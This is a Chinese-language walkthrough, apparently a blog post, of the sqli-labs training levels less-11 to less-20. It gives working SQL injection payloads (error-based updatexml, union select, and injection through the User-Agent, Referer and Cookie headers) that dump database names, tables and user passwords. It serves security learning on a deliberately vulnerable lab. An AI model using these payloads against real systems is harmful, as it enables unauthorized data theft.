1.less-11
1.判断类型
根据测试在使用 " 不会报错,' 会报错,所以他是字符型的并且被单引号闭合,而且只有用户
登陆成功才会显示数据。所以先尝试报错注入
data:image/s3,"s3://crabby-images/d746c/d746c75c5ceaadbdc2e380a6c55ee58b3415936e" alt=""
2.爆数据库
bash
' and updatexml(2,concat(0x7e,(select database()),0x7e),2)--+
data:image/s3,"s3://crabby-images/15e96/15e969f056e33634e31216e5b33cc33d91580049" alt=""
3.爆数据表
data:image/s3,"s3://crabby-images/e119b/e119b1cdb0bc55c7836c253f6e4eb64110c150f6" alt=""
4.爆字段
data:image/s3,"s3://crabby-images/7cf97/7cf97f92b7a39211088501d4a1a45306f83fe86f" alt=""
5.爆数据
data:image/s3,"s3://crabby-images/a8eb5/a8eb57cdde4c9c8414b4d137de7db599db32b131" alt=""
2.less-12
1.判断类型
data:image/s3,"s3://crabby-images/a8f5f/a8f5ff79883dfa42c8a48987edd4f286041716df" alt=""
data:image/s3,"s3://crabby-images/bc239/bc239119db6326119cb94596bfe68f34a51415cc" alt=""
data:image/s3,"s3://crabby-images/be6e0/be6e09978e679919a40c0dbfdd28cf77ddb810d0" alt=""
经过测试发现是xx型,通过双引号闭合。 并且没有正常回显。
2.判断字段个数
data:image/s3,"s3://crabby-images/8563e/8563ef020eee30db427553683c06d174c63174e4" alt=""
data:image/s3,"s3://crabby-images/d8f2b/d8f2b5d40b87896b8e3476049dd60e8248891890" alt=""
3.获取当前的数据库
data:image/s3,"s3://crabby-images/dd6f4/dd6f45e4f49a5fe13415f57250049376ae9dce38" alt=""
4.获取数据表
bash
") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
data:image/s3,"s3://crabby-images/20821/20821aa825e3b3e28ae1328aedf069fe5d70d071" alt=""
- 获取字段
data:image/s3,"s3://crabby-images/c7a44/c7a44d72712a27412d73f21d84702a16168218c5" alt=""
bash
") union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+
6.获取数据
bash
") union select 1,group_concat(username,password) from users--+
data:image/s3,"s3://crabby-images/544a9/544a9476c27daea888b75bcf465294d809ea192d" alt=""
3.less-13
1.判断类型
data:image/s3,"s3://crabby-images/2a340/2a340ce64989b40070088f40d89bb17f85289a57" alt=""
经过测试发现 是单引号闭合的xx型与less-12 大致相同。
4.less-14
与less-11类似
1.判断类型
data:image/s3,"s3://crabby-images/2e3ce/2e3ceb170d51a88dcd69e4175977d1ce9777e841" alt=""
2.判断字段个数
data:image/s3,"s3://crabby-images/657b3/657b37aa7b63af0685ca0e439be1d65691ff3ecc" alt=""
剩下步骤与less-13,less-12类似。
5.less-15
1.判断类型
data:image/s3,"s3://crabby-images/290cf/290cf426a797b2ebd7ff9a69375eef39ab7ccb2a" alt=""
经过测试发现只有登陆成功,失败的界面,尝试盲注,
由于手工比较麻烦可以使用sqlmap尝试。
6.less-16
也是布尔盲注操作同上。
7.less-17
出现数据 的 delete、update、insert直接用报错注入。
1.爆字段
bash
' and updatexml(2,concat(0x7e,(select database()),0x7e),0)#
data:image/s3,"s3://crabby-images/c8f22/c8f22b57872c230171dccb1aafd0f42f2b915ae0" alt=""
2.爆数据表
bash
' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)--+
data:image/s3,"s3://crabby-images/aa464/aa464d543824c4c1b421d743502a78335439ffab" alt=""
3.爆字段
bash
1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1),1)--+
data:image/s3,"s3://crabby-images/f7c96/f7c9601eea274824a25ea6db5403aad87dfc3a8a" alt=""
4.爆数据
data:image/s3,"s3://crabby-images/e7388/e7388691d8ea4f6b0ddffbc36b8e57257b1a1d97" alt=""
会报错因为同一张表不能同时更新,查看。查看其他表不报错
data:image/s3,"s3://crabby-images/797ec/797ec7971bc4abec5453c23dd6c555a1a2b2a671" alt=""
8.less-18
data:image/s3,"s3://crabby-images/30d3f/30d3fce568b331c175a49f0a0bccb43705965b7a" alt=""
使用正确的密码登陆发现出现UA信息,发现是UA注入,所以尝试报错注入,而且是单引号闭合
data:image/s3,"s3://crabby-images/af071/af071bac1e483bfa90cc24ffaa36b8ed0a2a926c" alt=""
data:image/s3,"s3://crabby-images/0b8ae/0b8ae71e2e6094beb1ac373747db99790c848ac0" alt=""
通过查看源码,拼接的sql语句要多加 )才能执行顺利。
爆数据库
sql语句
sql
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1',2,updatexml(1,concat(0x7e,(select database())),1))#', '192.168.190.1', 'Dhakkan')
bash
1',2,updatexml(1,concat(0x7e,(select database())),1))#
data:image/s3,"s3://crabby-images/8dece/8dece9ae4da6661439c24cca01a1e3f0355ede2c" alt=""
按步骤执行下去即可,其余 前面已有介绍,这里就不展示了。
9.less-19
data:image/s3,"s3://crabby-images/b0f28/b0f286df0aee249eee6f5aca8b805e2f710ec8a6" alt=""
与less-18类似,是refer注入
data:image/s3,"s3://crabby-images/dddab/dddab72963e9164c2bfd3ce7fd26bb429ed9e113" alt=""
10.less-20
cookies注入 ,根据源代码, uname参数不可省。
data:image/s3,"s3://crabby-images/63079/63079e0fde1adc07dade7c9bed9ffde1769b12df" alt=""
爆数据库
bash
uname=admin'and updatexml(1,concat(1,(database()),1),2)--+
data:image/s3,"s3://crabby-images/ab959/ab959b60c87e4c809090baf57b5259a8515f3cdd" alt=""
报数据表
bash
uname=admin'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema="security" ),1),2)--+
data:image/s3,"s3://crabby-images/8f57e/8f57e051b7dfbfe8549bcca999f90e9d42a3dcf5" alt=""
爆字段
bash
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' )),0)#
爆数据
bash
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(password)from users )),0)#